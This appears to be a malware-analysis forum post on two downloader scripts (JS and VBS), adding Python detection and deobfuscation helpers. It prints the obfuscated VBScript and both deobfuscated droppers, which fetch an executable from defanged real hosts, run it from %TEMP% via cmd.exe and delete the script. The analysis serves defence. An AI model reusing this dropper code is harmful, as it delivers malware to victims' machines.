Malware Analysis 2 fresh scripted samples from - 16-8-16-5.62456 - js , vbs

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From a new Malware Vault sample (thanks to @Solarquest)

(1) AGL_bill.zip => AGL_bill.js

3/53
(when I posted)
https://www.virustotal.com/en/file/6d41e908becdca7028e62eba51b899912eb1a218217977d420c8fc19f1beaecf/analysis/
https://www.hybrid-analysis.com/sample/6d41e908becdca7028e62eba51b899912eb1a218217977d420c8fc19f1beaecf?environmentId=100

Because it uses an obfuscation method similar to one seen in another post,
here is a link to the deobfuscation method used:

https://malwaretips.com/threads/quick-analysis-of-obfuscated-wanda-js-js-locky-m3-eldorado.62394/

Main difference: all vars and functions are inside the try...catch block.

Deobfuscated script:

// oWS, oFso and oShell are the WScript object, a Scripting.FileSystemObject and a
// WScript.Shell created earlier in the script (not reproduced here)
try {

    if (oWS.StdIn.Column) { // returns 1, a way to be sure the script runs under Windows Script Host

        oHttp = oWS.CreateObject("MSXML2.XMLHTTP");
        oStream = oWS.CreateObject("ADODB.Stream");
        xrodukis3 = oFso.GetSpecialFolder(2);           // %TEMP%
        temp_file_name = oFso.GetTempName();            // example: rad92A53.tmp
        useless_var = oHttp.open("GET", "hxxp://gnhdd.com/templates/file.exe", 0);
        useless_var = oHttp.send();
        oStream.type = 1;                               // adTypeBinary
        response = oHttp.ResponseBody;
        not_use = oWS.ScriptFullName;
        useless_var = oStream.Open();
        useless_var = oStream.Write(response);
        useless_var = oStream.SaveToFile(xrodukis3 + "\\" + temp_file_name); // example: %TEMP%\rad92A53.tmp
        useless_var = oStream.Close();
        useless_var = oShell.run("cmd.exe /c " + "%TEMP%\\" + temp_file_name, 0);
        // example => cmd.exe /c C:\Users\DardiM\AppData\Local\Temp\rad92A53.tmp

    }
} catch (e) {}

Same steps / explanations that I gave in the previous thread linked above.

The payload: too fresh to be sure of its family (detection failed with Cuckoo).
Trojan.Win32.Yakes.qnkq by KTS 2017

https://www.virustotal.com/en/file/3af7e0b3e72359ab2106b99cdc20053c80ff820bd0a501d25cf9fd1bd5458f51/analysis/
 
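Detection logic for the chain this dropper ends with (a script host writes the download into %TEMP% under a GetTempName()-style name, radXXXXX.tmp, then runs it through cmd.exe /c), as an added example in Python that is not part of the post. The process-creation events are constructed here in a Sysmon-like Image / ParentImage / CommandLine form, and the user paths are invented; both are assumptions, not telemetry from the sample.

```python
"""Flag the wscript/cscript -> cmd.exe /c %TEMP%\radXXXXX.tmp -> payload chain.
Added example, not code from the MalwareTips post. Event layout (Sysmon-like
EventId/Image/ParentImage/CommandLine keys) is an assumption."""
import re

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

# FileSystemObject.GetTempName() yields rad + 5 hex digits + .tmp; match it under the
# temp directory whether written unexpanded (%TEMP%, as in the script) or expanded.
TEMP_RAD_TMP = re.compile(r"(?i)(?:%temp%|\\appdata\\local\\temp)\\rad[0-9a-f]{5}\.tmp\b")


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def rule_script_host_cmd_temp(ev):
    """A script host spawning cmd.exe /c on a radXXXXX.tmp in the temp directory."""
    return (_basename(ev["ParentImage"]) in SCRIPT_HOSTS
            and _basename(ev["Image"]) == "cmd.exe"
            and re.search(r"(?i)\s/c\s", ev["CommandLine"]) is not None
            and TEMP_RAD_TMP.search(ev["CommandLine"]) is not None)


def rule_tmp_executed(ev):
    """A radXXXXX.tmp in the temp directory started as a process (the dropped payload)."""
    return TEMP_RAD_TMP.search(ev["Image"]) is not None


RULES = (rule_script_host_cmd_temp, rule_tmp_executed)


def detect(events):
    """Return [(event index, rule name)] for every process-creation event a rule matches."""
    hits = []
    for i, ev in enumerate(events):
        if ev.get("EventId") != 1:        # Sysmon event 1 = process creation
            continue
        for rule in RULES:
            if rule(ev):
                hits.append((i, rule.__name__))
    return hits


# Constructed sample events (not real logs); the chain from the script, plus two non-hits.
EVENTS = [
    {"EventId": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\victim\Downloads\AGL_bill.js"'},
    {"EventId": 1, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c %TEMP%\rad92A53.tmp"},
    {"EventId": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Users\victim\AppData\Local\Temp\rad92A53.tmp",
     "CommandLine": r"C:\Users\victim\AppData\Local\Temp\rad92A53.tmp"},
    {"EventId": 1, "ParentImage": r"C:\Windows\explorer.exe",   # benign: user listing %TEMP%
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir C:\Users\victim\AppData\Local\Temp"},
    {"EventId": 3, "ParentImage": r"C:\Windows\System32\wscript.exe",  # not a process event
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c %TEMP%\rad92A53.tmp"},
]

if __name__ == "__main__":
    for idx, rule in detect(EVENTS):
        print(f"event {idx}: {rule} -> {EVENTS[idx]['CommandLine']}")
```

The second rule is the one that survives a change of launcher: if a later variant drops the cmd.exe hop and runs the .tmp directly from the script host, the first rule is silent but the second still fires on the payload's own process image.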

DardiM

(2) Penalty 233122912.vbs:

0/54
(when I posted)
Antivirus scan for a3ec02095428428c217982c0d7ede8c8d78ea2b79783fbbca8d8215d99ed5d5a at 2016-08-17 01:02:27 UTC - VirusTotal
https://www.hybrid-analysis.com/sample/a3ec02095428428c217982c0d7ede8c8d78ea2b79783fbbca8d8215d99ed5d5a?environmentId=100

Because it uses an obfuscation method similar to one seen in another post,
here is a link to that analysis (part (2) 2.8.vbs):

https://malwaretips.com/threads/downloaders-scripted-samples-from-malware-vault-1-8-16-13.61898/

1) Looking at the whole code

Script used: Visual Basic Script (VBScript)
Dim kzedgihbe2
Dim eweq, liqu, miptejwa9, yhjajnycr, jwabypu, bkycasi, jkenucmy, mebzuvyn, qjopko
Dim ugzuzcakj7, oxtigsy, czoklyw, mnuqxoh, ivez, xazibzavx, udqyzgenja, kbazamym, ejubigtu, ojegxygvi, echapu9
Dim rhowa, mdani
Dim ozyfo8, ehfaj, ukogl3, iduh5, mpoqbyfr0, kwavacky, ivpelxazx, lagu, oqnotp0, idzumguvc3, ohegq
Dim dodyrvu
Dim diqo
Dim bycfo4, snexusvu6, ononpyju, hejqoxi9, aqym, ejmypyk, ojase, qjaxte
Dim qasujut
Dim ydqarciwo, wukjaj, gorsy8, bvylfatwyqk3, avyv0, emofhodso1, utjobhejve3, vybigob
Dim gijmewwy
Dim lazfu6, pmires, atovf6, lxipgas
Dim mace2
Dim ibedmosli7
Dim esyrd7
Dim dunxamm
Dim nvajevwoq
function qucnikg ()
Dim ojyvava
ojyvava = Array ("anruhq", "kokzo", "rwuv", "eci", "ytz", "yp", "b.")(6)
qucnikg = ojyvava
End function
qasujut = " 0"
function ihrunam ()
Dim ankyjutn
ankyjutn = "of"
ihrunam = ankyjutn
End function
function esejs ()
Dim lyxafn
lyxafn = "St"
esejs = lyxafn
End function
qjopko = Array ("gma", "zeda", "ij", "ywqe", "ab", "eq")(5)
snexusvu6 = "GE"
oqnotp0 = Array ("aky", "mduth", "rg", "la", "ovet", "gani", "ypb")(2)
kbazamym = Array ("/b", "axib", "jda", "nwu", "xhute", "vus")(0)
function duxog ()
Dim xfazzegq
xfazzegq = Array ("fevge", "tumu", "ip", "gow", "jtopma", "pbebe", "rma")(2)
duxog = xfazzegq
End function
function kdyskifqo ()
Dim okyfbamy
okyfbamy = ".e"
kdyskifqo = okyfbamy
End function
miptejwa9 = "ip"
function irqemmape ()
Dim pqyjekqus
pqyjekqus = Array ("af", "re", "rjacsi", "vfih", "ko", "uh", "suka", "alo")(1)
irqemmape = pqyjekqus
End function
function mossi ()
Dim wnogo
wnogo = Array ("da", "ra", "osdyh", "zo", "uc", "zku", "ech", "kgyn")(0)
mossi = wnogo
End function
ibedmosli7 = Array ("nsa", "yry", "fyli", "em", "dpi", "ata", "ola")(3)
function cesuglac ()
Dim ikquxi
ikquxi = Array ("mu", "ty", "nalri", "uvo", "ib", "or", "bs", "iggi")(6)
cesuglac = ikquxi
End function
bvylfatwyqk3 = "/c"
function igatave ()
Dim wqinomy
wqinomy = "n "
igatave = wqinomy
End function
function mapi ()
Dim cynger
cynger = "/b"
mapi = cynger
End function
function vgagukydx ()
Dim ybyjz
ybyjz = "ru"
vgagukydx = ybyjz
End function
ojegxygvi = Array ("le", "wabci", "zulke", "bovu", "ok", "ogi")(0)
function ycoqwy ()
Dim ekcan
ekcan = "ri"
ycoqwy = ekcan
End function
function mexycozd ()
Dim ifkucuju
ifkucuju = "t."
mexycozd = ifkucuju
End function
ojase = Array ("ipp", "awpo", "je", "fyrxa", "ezizx", "etwibx")(2)
function qhaqerky ()
Dim ixpawlizro
ixpawlizro = "wi"
qhaqerky = ixpawlizro
End function
function ypase ()
Dim ugyhju
ugyhju = Array ("che", "asag", "ak", "ct", "jej", "sha", "sef")(3)
ypase = ugyhju
End function
kzedgihbe2 = "Sh"
echapu9 = Array ("nwi", "eq", "ilxyfq", "ublusr", "ejop", "t.")(5)
function gyttomi ()
Dim azil
azil = Array ("wly", "alte", "ra", "cju", "T", "smori", "dfy", "be")(4)
gyttomi = azil
End function
function achadeva ()
Dim rlonpajerc
rlonpajerc = Array ("uvk", "kbat", "ng", "iwasw", "tquca", "ggizs")(2)
achadeva = rlonpajerc
End function
function ybanass ()
Dim uberebe
uberebe = Array ("hicu", "nuxo", "saci", "ybdirp", "XM", "uv")(4)
ybanass = uberebe
End function
function sjeru ()
Dim ikuwnamz
ikuwnamz = "uj"
sjeru = ikuwnamz
End function
utjobhejve3 = Array ("unroqr", "khipa", "fizsy", "nbupi", "abnev", "tido", "gvetv", "wo")(7)
iduh5 = Array ("ry", "guv", "eq", "nja", "oplo", "ifka", "0,", "rywe")(6)
ivez = Array ("pu", "atdeg", "ubk", "ohridf", "epjyk", "thuqn")(0)


czoklyw = Array ("egs", "yhzu", "ysyr", "lN", "xov", "er")(3)
esyrd7 = "cr"
avyv0 = Array ("bu", "aje", "qoznu", "hmyp", "vmuhja", "qiz", "e")(6)
function ofpisxappi ()
Dim atypur
atypur = Array ("ytbelz", "lysi", "su", "hybr", "oxo", "losz", "Mi", "fdevxe")(6)
ofpisxappi = atypur
End function
diqo = Array ("cu", "tamc", "rzufr", "axosj", "temtu", "ul", "ewzi", "fafl")(5)


pmires = "eb"
rhowa = "ri"
bkycasi = "el"
function uleh ()
Dim apyrruwhu
apyrruwhu = "pt"
uleh = apyrruwhu
End function
function aloxsimjy ()
Dim rjulwuhxa
rjulwuhxa = Array ("obif", "fmemd", "itu", "hoxmy", "ep", "ace", "ri")(6)
aloxsimjy = rjulwuhxa
End function


dunxamm = ":/"
oxtigsy = "os"
function ltikoqxub ()
Dim jfetdamyt
jfetdamyt = Array ("osnixh", "mzuqfi", "rk", "edb", "pjivk", "uja")(2)
ltikoqxub = jfetdamyt
End function
function vodfy ()
Dim mgolum
mgolum = Array ("yxeng", "irz", "jryva", "ogc", "eme", "st", "uhde")(5)
vodfy = mgolum
End function
ohegq = Array ("atis", "il", "onso", "oqag", "za", "vo", "ylr")(5)
wukjaj = "ex"
function ironx ()
Dim sujsykritb
sujsykritb = Array ("in", "ale", "okta", "po", "etxoq", "cca")(0)
ironx = sujsykritb
End function


liqu = "l"
function lqatme ()
Dim ewfujud
ewfujud = " "
lqatme = ewfujud
End function
atovf6 = "TT"
function ubfuxnefi ()
Dim finjojsyss
finjojsyss = "xe"
ubfuxnefi = finjojsyss
End function
vybigob = Array ("icacq", "as", "idky", "ke", "ujivs", "sodr", "gekqu", "iz")(7)
function ixdegukwa ()
Dim thaxqeqo
thaxqeqo = ".o"
ixdegukwa = thaxqeqo
End function
function oxoxe ()
Dim xzavranbi
xzavranbi = Array ("Ad", "oshak", "obwaxh", "om", "ro", "fewi", "ynl", "sez")(0)
oxoxe = xzavranbi
End function
jkenucmy = Array ("xw", "ygw", "rogre", "atij", "idj", "uf", "ace")(0)
function adfikampu ()
Dim axzedf
axzedf = "tF"
adfikampu = axzedf
End function


function hazjofe ()
Dim ywjikwu
ywjikwu = "cr"
hazjofe = ywjikwu
End function
function zpitokw ()
Dim gapy
gapy = Array ("iny", "od", "ugrunr", "yjnyb", "qlepo", "ide", "yhlex", "qy")(1)
zpitokw = gapy
End function
ononpyju = Array ("sn", "kyxje", "ativ", "ewyw", "oxruvc", "ypre", "cwuzc")(0)
ivpelxazx = "m0"
gorsy8 = Array (" y", "ta", "abifw", "loqw", "ohi", "is", "gjyj", "ora")(0)
qjaxte = "0."


yhjajnycr = "ht"
ehfaj = Array ("ogx", "abmu", "awej", "qxuph", "mpyca", "zolp", "Fi")(6)
ydqarciwo = "ab"
ozyfo8 = Array ("ojva", "yzdy", "St", "ymjejd", "okhaqr", "mi", "apzi")(2)
function amxavafru ()
Dim jozkevrofj
jozkevrofj = Array ("ohe", "ga", "pbico", "ofecw", "eqewm", "qvilk", "qo", "cr")(7)
amxavafru = jozkevrofj
End function
ejubigtu = "am"
function evkanp ()
Dim bymi
bymi = "Ob"
evkanp = bymi
End function
function uftuxe ()
Dim cucsyvrodh
cucsyvrodh = Array ("qe", "cwan", "fbize", "ly", "uclu", "uj")(3)
uftuxe = cucsyvrodh
End function
idzumguvc3 = Array ("qy", "rmelti", "icgeb", "atuc", "ufu", "cuvdi", "am")(6)
jwabypu = Array ("yrucm", "xodka", "ffa", "ohb", "fd", "jiz", "ics")(4)
bycfo4 = "da"
hejqoxi9 = Array ("jvo", "e ", "yr", "ez", "fitby", "ufvyr", "ke")(1)
function uvqowcanza ()
Dim ywtivev
ywtivev = Array ("Sc", "he", "api", "unimw", "advy", "arbyjl")(0)
uvqowcanza = ywtivev
End function
function xwicnypo ()
Dim pusy
pusy = Array ("LH", "xvyvd", "acx", "uhxu", "akasd", "afcyfw", "oga")(0)
xwicnypo = pusy
End function
function rgomi ()
Dim udetxi
udetxi = "ta"
rgomi = udetxi
End function
function sugiz ()
Dim ysun
ysun = Array ("kbo", "enreqf", "te", "wiry", "tp", "edo")(4)
sugiz = ysun
End function
dodyrvu = Array ("vo", "dbice", "uxy", "St", "asrop", "vjo", "olo")(3)
function aboh ()
Dim pcizhycf
pcizhycf = "d."
aboh = pcizhycf
End function
function ofdac ()
Dim ewonnyta
ewonnyta = "le"
ofdac = ewonnyta
End function
aqym = Array ("ihzy", "WS", "zon", "htig", "kcik", "buzs")(1)
udqyzgenja = Array ("gyjly", "vur", "ewhuv", "cso", "Sy", "ydup")(4)
function civyl ()
Dim eprehr
eprehr = Array ("gd", "vdoku", "rdotu", "igqi", "vy", "tky")(0)
civyl = eprehr
End function
mnuqxoh = Array ("zi", "qzuwfy", "vcacri", "rdubf", "yjnuc", "avpi", ".S")(6)
function wybkisiw ()
Dim cmopyxx
cmopyxx = "ng"
wybkisiw = cmopyxx
End function
nvajevwoq = "P"
mebzuvyn = ejubigtu & avyv0
ejmypyk = oxoxe & zpitokw & qucnikg & ozyfo8 & irqemmape & idzumguvc3
xazibzavx = ydqarciwo & bycfo4 & ivpelxazx & mnuqxoh & amxavafru
lagu = qjopko & ohegq & mossi & rgomi & qjaxte & vgagukydx & igatave & vybigob & sjeru & uftuxe & ivez & yhkyri & gorsy8 & qhaqerky & jkenucmy & iduh5 & qasujut
emofhodso1 = aqym & esyrd7 & duxog & mexycozd & kzedgihbe2 & bkycasi & liqu
lazfu6 = qjefhewa & aboh & wukjaj & hejqoxi9 & bvylfatwyqk3 & lqatme
eweq = uvqowcanza & rhowa & uleh & ironx & wajqiqwun & ehfaj & ojegxygvi & udqyzgenja & vodfy & ibedmosli7 & evkanp & ojase & ypase
lxipgas = ofpisxappi & hazjofe & oxtigsy & ihrunam & echapu9 & ybanass & xwicnypo & atovf6 & nvajevwoq
ukogl3 = esejs & ycoqwy & wybkisiw
mace2 = miptejwa9 & adfikampu & diqo & czoklyw
ugzuzcakj7 = snexusvu6 & gyttomi
kwavacky = yhjajnycr & sugiz & dunxamm & mapi & pmires & rhijho & ofdac & ixdegukwa & oqnotp0 & kbazamym & jwabypu & hepbyw & civyl & feglegedv & cesuglac & ononpyju & utjobhejve3 & ltikoqxub & kdyskifqo & ubfuxnefi
mpoqbyfr0 = dodyrvu & aloxsimjy & achadeva
function nuzro ()
Dim mqivi
mqivi = 1
nuzro = mqivi
End function
mdani = 2
gijmewwy = 2
function uhpihmyz (esowsovu, abdam0)
if TypeName(abdam0.ScriptName) = mpoqbyfr0 then
Dim lidbeqli0, emiwilw
emiwilw = mace2
lidbeqli0 = Eval(xazibzavx& emiwilw &mebzuvyn)
esowsovu.deleteFile ( lidbeqli0 )
end if
End function
function qradopipd (eqvodata0, ywixw0, abdam0)
if TypeName(abdam0.ScriptName) = mpoqbyfr0 then
Dim izujlypu
izujlypu = lazfu6
Execute(lagu)
end if
End function
Dim ywixw0
Dim ojymlida8
Set abdam0 = WScript
Set fupi = CreateObject(lxipgas)
Set esowsovu = CreateObject(eweq)
Set ssafhimjo0 = esowsovu.GetSpecialFolder( mdani)
Set fjudqobjizc2 = CreateObject(ejmypyk)
Set eqvodata0 = CreateObject(emofhodso1)
ojymlida8 = esowsovu.GetTempName()
delimit = "\"
ywixw0 = ssafhimjo0 & delimit & ojymlida8
resso = ugzuzcakj7
fupi.Open resso, kwavacky, False
fupi.Send
fjudqobjizc2.Type = nuzro
fjudqobjizc2.Open
fjudqobjizc2.write fupi.responseBody
fjudqobjizc2.savetofile ywixw0, mdani
qradopipd eqvodata0, ywixw0, abdam0

uhpihmyz esowsovu, abdam0

This script only uses vars and functions to build the right values at run time.

2) Looking at the end:

Dim ywixw0
Dim ojymlida8
Set abdam0 = WScript
Set fupi = CreateObject(lxipgas)
Set esowsovu = CreateObject(eweq)
Set ssafhimjo0 = esowsovu.GetSpecialFolder( mdani)
Set fjudqobjizc2 = CreateObject(ejmypyk)
Set eqvodata0 = CreateObject(emofhodso1)
ojymlida8 = esowsovu.GetTempName()
delimit = "\"
ywixw0 = ssafhimjo0 & delimit & ojymlida8
resso = ugzuzcakj7
fupi.Open resso, kwavacky, False
fupi.Send
fjudqobjizc2.Type = nuzro
fjudqobjizc2.Open
fjudqobjizc2.write fupi.responseBody
fjudqobjizc2.savetofile ywixw0, mdani
qradopipd eqvodata0, ywixw0, abdam0

uhpihmyz esowsovu, abdam0

This is where we have to begin the deobfuscation steps from.
Only variable replacement by strings / concatenations of variable contents, arrays of strings, basic functions
(see the link above to an analogous obfuscation method already analyzed).

One example:

lxipgas = ofpisxappi & hazjofe & oxtigsy & ihrunam & echapu9 & ybanass & xwicnypo & atovf6 & nvajevwoq

function ofpisxappi ()
Dim atypur
atypur = Array ("ytbelz", "lysi", "su", "hybr", "oxo", "losz", "Mi", "fdevxe")(6)
ofpisxappi = atypur
End function

function hazjofe ()
Dim ywjikwu
ywjikwu = "cr"
hazjofe = ywjikwu
End function

oxtigsy = "os"

function ihrunam ()
Dim ankyjutn
ankyjutn = "of"
ihrunam = ankyjutn
End function

echapu9 = Array ("nwi", "eq", "ilxyfq", "ublusr", "ejop", "t.")(5)

function ybanass ()
Dim uberebe
uberebe = Array ("hicu", "nuxo", "saci", "ybdirp", "XM", "uv")(4)
ybanass = uberebe
End function

function xwicnypo ()
Dim pusy
pusy = Array ("LH", "xvyvd", "acx", "uhxu", "akasd", "afcyfw", "oga")(0)
xwicnypo = pusy
End function

atovf6 = "TT"

nvajevwoq = "P"

=> "Mi" & "cr" & "os" & "of" & "t." & "XM" & "LH" & "TT" & "P"

lxipgas = "Microsoft.XMLHTTP"

All parts can be retrieved this way:

CreateObject(lxipgas) => CreateObject("Microsoft.XMLHTTP")
CreateObject(eweq) => CreateObject("Scripting.FileSystemObject")
esousovu.GetSpecialFolder( mdani) => esowsovu.GetSpecialFolder( 2)
CreateObject(ejmypyk) => CreateObject("adodb.Stream")
CreateObject(emofhodso1) => CreateObject("WScript.Shell")
esowsovu.GetTempName() => get a temp file name

3) Deobfuscated Script:

Set oWS = WScript
Set oHttp = CreateObject("Microsoft.XMLHTTP")          ' to make the HTTP request
Set oFso = CreateObject("Scripting.FileSystemObject")  ' manipulate path / file name
Set path = oFso.GetSpecialFolder( 2)                   ' %TEMP%
Set oStream = CreateObject("adodb.Stream")             ' stream to store responseBody
Set oShell = CreateObject("WScript.Shell")             ' shell object
temp_file_nam = oFso.GetTempName()                     ' example: rad350D6.tmp
delimit = "\"

file_path = path & delimit & temp_file_nam             ' %TEMP%\rad350D6.tmp

oHttp.Open "GET", "hxxp://bebelle.org/bfdt9gdz/bssnwork.exe", False
oHttp.Send
oStream.Type = 1                                       ' adTypeBinary
oStream.Open
oStream.Write oHttp.responseBody
oStream.SaveToFile file_path, 2                        ' adSaveCreateOverWrite

runPayload oShell, file_path, oWS                      ' execute the file
deleteScript oFso, oWS                                 ' delete the vbs script

' named "execute" in the obfuscated logic; renamed here because Execute is a reserved VBScript statement
Function runPayload(oShell, file_path, oWS)
    If TypeName(oWS.ScriptName) = "String" Then
        Execute "oShell.run ""cmd.exe /c "" & file_path, 0"   ' => cmd.exe /c %TEMP%\rad350D6.tmp
    End If
End Function

Function deleteScript(oFso, oWS)
    If TypeName(oWS.ScriptName) = "String" Then
        oFso.DeleteFile Eval("oWS.ScriptFullName")     ' the path of the running .vbs
    End If
End Function

4) Payload:

hxxp://bebelle.org/bfdt9gdz/bssnwork.exe

Crystal Security:

Hash: a880ef636030b53ce085edce602c0b28
Detections:
McAfee: Artemis!A880EF636030
Baidu: Win32.Trojan.WisdomEyes.151026.9950.9976
ESET-NOD32: a variant of Generik.MLIHWMQ
Avira: TR/Crypt.Xpack.dkwh
AhnLab-V3: Trojan/Win32.Inject.N2081829946
Rising: Malware.XPACK-LNR/Heur!1.5594
AVG: Generic37.CMAZ

Threat score: 14,3%
Overall: Unsafe

 
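The manual walk-through above (variable replacement, array picks, one-line functions, & concatenation) can be done mechanically. As an added example that is not code from the post, here is a small Python resolver for exactly those constructs; its input is the lxipgas and lazfu6 pieces copied from the listing above (Dim lines dropped), and it assumes nothing else about the script. Its output also shows something the hand resolution does not: a name with no definition in the listing resolves to "" (in VBScript without Option Explicit an undeclared variable is Empty, which concatenates as an empty string), so lazfu6 comes out as "d.exe /c " because qjefhewa is never defined in the pasted code. When a resolved string comes out short like that, look for the missing definition (here yhkyri, wajqiqwun, rhijho, hepbyw and feglegedv are in the same situation) before concluding that the sample is broken.

```python
"""Resolver for the VBScript string-building obfuscation in the listing above.
Added example, not code from the post. Handles only what the post describes:
literal assignments, Array(...)(n) picks, one-line functions returning such a
value, and '&' chains. An undefined name resolves to "" (VBScript's Empty)."""
import re

# Constructed input: the lxipgas and lazfu6 chains and their pieces, copied from
# the listing above with the Dim lines dropped. qjefhewa is not defined there.
SAMPLE = r'''
lxipgas = ofpisxappi & hazjofe & oxtigsy & ihrunam & echapu9 & ybanass & xwicnypo & atovf6 & nvajevwoq
function ofpisxappi ()
atypur = Array ("ytbelz", "lysi", "su", "hybr", "oxo", "losz", "Mi", "fdevxe")(6)
ofpisxappi = atypur
End function
function hazjofe ()
ywjikwu = "cr"
hazjofe = ywjikwu
End function
oxtigsy = "os"
function ihrunam ()
ankyjutn = "of"
ihrunam = ankyjutn
End function
echapu9 = Array ("nwi", "eq", "ilxyfq", "ublusr", "ejop", "t.")(5)
function ybanass ()
uberebe = Array ("hicu", "nuxo", "saci", "ybdirp", "XM", "uv")(4)
ybanass = uberebe
End function
function xwicnypo ()
pusy = Array ("LH", "xvyvd", "acx", "uhxu", "akasd", "afcyfw", "oga")(0)
xwicnypo = pusy
End function
atovf6 = "TT"
nvajevwoq = "P"
lazfu6 = qjefhewa & aboh & wukjaj & hejqoxi9 & bvylfatwyqk3 & lqatme
function aboh ()
pcizhycf = "d."
aboh = pcizhycf
End function
wukjaj = "ex"
hejqoxi9 = Array ("jvo", "e ", "yr", "ez", "fitby", "ufvyr", "ke")(1)
bvylfatwyqk3 = "/c"
function lqatme ()
ewfujud = " "
lqatme = ewfujud
End function
'''

_ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")   # name = rhs; Dim/function/End lines do not match
_LITERAL = re.compile(r'^"((?:[^"]|"")*)"$')
_ARRAY_PICK = re.compile(r"^Array\s*\((.*)\)\s*\((\d+)\)$")


def parse_assignments(src):
    """name -> right-hand side for every plain assignment, including 'f = x' inside a function."""
    defs = {}
    for line in src.splitlines():
        m = _ASSIGN.match(line)
        if m:
            defs[m.group(1)] = m.group(2)
    return defs


def _split_concat(expr):
    """Split on '&' that sits outside string literals."""
    parts, buf, in_str = [], "", False
    for ch in expr:
        in_str ^= ch == '"'
        if ch == "&" and not in_str:
            parts.append(buf.strip())
            buf = ""
        else:
            buf += ch
    return parts + [buf.strip()]


def evaluate(expr, defs, stack=()):
    """Evaluate one right-hand side to the string the script would build at run time."""
    parts = _split_concat(expr)
    if len(parts) > 1:
        return "".join(evaluate(p, defs, stack) for p in parts)
    expr = parts[0]
    if m := _LITERAL.match(expr):
        return m.group(1).replace('""', '"')
    if m := _ARRAY_PICK.match(expr):
        items = re.findall(r'"((?:[^"]|"")*)"', m.group(1))
        return items[int(m.group(2))].replace('""', '"')
    if re.fullmatch(r"\w+", expr):                    # a variable or a one-line function
        if expr in stack:
            raise ValueError("cyclic definition: " + expr)
        return evaluate(defs[expr], defs, stack + (expr,)) if expr in defs else ""
    return expr                                       # numbers, method calls etc. left as-is


def resolve_chains(src):
    """{name: value} for every assignment whose right-hand side is an '&' chain."""
    defs = parse_assignments(src)
    return {n: evaluate(e, defs) for n, e in defs.items() if len(_split_concat(e)) > 1}
```

Feeding the whole listing from part 1) to resolve_chains() gives the CreateObject arguments and the URL in one pass; the three object names and the temp-path logic are what to grep the result for, since that is the download-and-execute pattern both samples in this thread share.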
